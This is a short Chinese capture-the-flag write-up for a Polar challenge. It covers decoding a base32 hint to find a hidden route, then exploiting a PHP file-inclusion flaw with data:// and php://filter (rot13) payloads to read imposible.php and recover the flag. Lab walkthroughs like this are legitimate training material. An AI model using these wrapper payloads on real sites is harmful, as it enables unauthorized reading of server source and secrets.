Polar 网站被黑

开题，挺好看的前端，可惜啥也没有。

信息搜集一波，扫目录出现几个敏感目录，但是没什么用。

继续搜集，在返回包中发现了HINT

F5XDAXZQNZSV6ZRRNZSF63JTF4======base32解码后是一个路由/n0_0ne_f1nd_m3/，访问，结果如下。

文件包含漏洞，flag应该在注释提示的imposible.php文件中。

绕过第一个if，data://协议和php://input协议都可以用

payload 1：

?text=data://text/plain,welcome to the 504sys

绕过第二个if，只需要能读文件即可。

payload 2：

file=php://filter/read=string.rot13/resource=imposible.php

最后payload：

?text=data://text/plain,welcome to the 504sys&file=php://filter/read=string.rot13/resource=imposible.php

rot13后的flag再次rot13一次还原